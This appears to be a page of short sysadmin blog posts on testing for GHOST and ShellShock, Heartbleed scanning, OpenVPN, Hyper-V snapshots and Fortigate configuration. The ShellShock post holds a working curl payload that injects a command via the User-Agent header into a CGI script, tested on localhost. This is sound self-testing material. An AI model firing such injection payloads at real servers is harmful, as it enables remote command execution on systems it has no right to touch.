GHOST: glibc gethostbyname buffer overflow – CVE-2015-0235

You can test your system against GHOST: glibc gethostbyname buffer overflow  CVE-2015-0235.

wget http://www.cirgan.net/GHOST.c
or compiled one
wget http://www.cirgan.net/GHOST

root@testme /home # gcc GHOST.c -o GHOST
root@testme /home # ./GHOST
not vulnerable

 

CVE-2014-6271 (ShellShock) remote code execution PoC

create a file for cgi execution
vi dummy.sh

fill with sample innocent code
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "dummy output"

execute it
curl -H 'User-Agent: () { :;}; echo boom>/tmp/boom'  http://localhost/cgi-bin/dummy.sh
dummy output

and see if the file is created
ls -l /tmp/boom
-rw-r--r--. 1 apache apache 5 Sep 25 21:20 /tmp/boom
 

GNU Bash (ShellShock) Vulnerability – CVE-2014-6271

A critical vuln has been discovered recently. Check for more information

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

also you can check your server via shell with the command below.

env x='() { :;}; echo vulnerable!’ bash -c ””

a patched system output looks like this

bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x’

 

Cneonction and nnCoection in HTTP Response Headers

You may receive Cneonction or nnCoection HTTP Reponse Header even if you are not using Keep-Alive on you member servers. Some loadbalancers rewrites http response headers.So you can see
nnCoection : Close
instead of
Connection : Close
Your WebServer is returning the response header Connection: close but loadbalancer rewrites it to nnCoection: close because you have keep-alive enabled on your loadbalancer and the loadbalancer want to keep connection so it replaces Connection header.

The case I met on Netscaler MPX appliance, you should disable Client Keep Alive on your service or Service Group. So, LB will never send Connection response to clients.
Otherwise, you have to rewrite nnCoection ..
nncoection

Scanning OpenSSL HeartBleed Vuln with Nmap

heartbleed

There is serious vulnerability OpenSSL cryptographic software library which allows stealing the protected  information ..
This bug allows anyone on the Internet to read the memory of the system which runs the vulnerable OpenSSL version. So the attackers easily eavesdrop the secret keys, usernames,passwords which resides in the memory…
Continue reading “Scanning OpenSSL HeartBleed Vuln with Nmap”

How to install OpenVPN Server

Below you will find how to install OpenVPN server.  At the end of the article;

1- We will have a VPN server running under linux..
2- We will be using linux pam accounts to authenticate clients
3- All clients connected can access local network and each other
4- All clients will use the VPN server to access the internet.
5- VPN server will act as Remote to Site
6- We will have a sample windows client configuration to connect.

Setup
Ubuntu Server 12.04
WAN 192.168.1.33/30
LAN 172.16.70.0/24
VPN 10.8.0.0/24
Continue reading “How to install OpenVPN Server”

HyperV CSV Stuck at “Backup in Progress”

If your backup software is using Microsoft VSS to take snapshot of your cluster volumes, sometimes your CSV stuck in redirection access and telling that “Backup in Progress” even if there no running backup at that time..

1- You cannot turn off redirection mode
2- you cannot change owner of volume
3- There is no running backup jobs

Then you may delete the snapshot of the volume in order to bring that volume “Online”
so login to the hyperv node which is the owner of that volume.

Run CMD with elevated privileges.

Enter the volume which backup takes place
cd C:\ClusterStorage\Volume8

Run diskshadow utility
list the volumes which have shadow copies.
DISKSHADOW>LIST SHADOWS ALL
if you are sure about what to delete then you may delete corresponding copy or delete all as you can see below.
DISKSHADOW>DELETE SHADOWS ALL

diskshadow

 

Excluding Network from BGP on Fortigate

Assuming you are re-distributing your fortigate networks and you want to exclude one or some of your networks from distribution.

Here is an example config.

PS: replace “XXX” with your config..

config router prefix-list
edit "youaclname"
config rule
edit 1
set prefix "IPaddress "SubnetMask"
unset ge
unset le
next
end

config router route-map
edit "rmap-bgp"
config rule
edit 1
set action deny
set match-ip-address "youraclname"
next
edit 2
next
end
next
end

config router bgp
set as XXXX
set log-neighbour-changes enable
config neighbor
edit "neigbourIP"
set remote-as XXXX
set route-map-out "rmap-bgp"
set send-community6 disable
next
end
config redistribute "connected"
set status enable
end
config redistribute "rip"
end
config redistribute "ospf"
end
config redistribute "static"
end
config redistribute "isis"
end
config redistribute6 "connected"
end
config redistribute6 "rip"
end
config redistribute6 "ospf"
end
config redistribute6 "static"
end
config redistribute6 "isis"
end
set router-id XXX.XXX.XXX.XXX
end

Fortigate 3810A TFTP Error – Open boot device failed

You may meet “Open boot device failed” if you are upload a firmware via TFTP. I think Fortigate 3810A doesnt support Fresh firmware install via TFTP for FortiOS 5.0

The workaround is to upload latest 4.x release via TFTP then upgrade to 5.0 via GUI.
As the time I write this post latest release for 5.x is GA patch 6 and for 4.x is MR3Path15.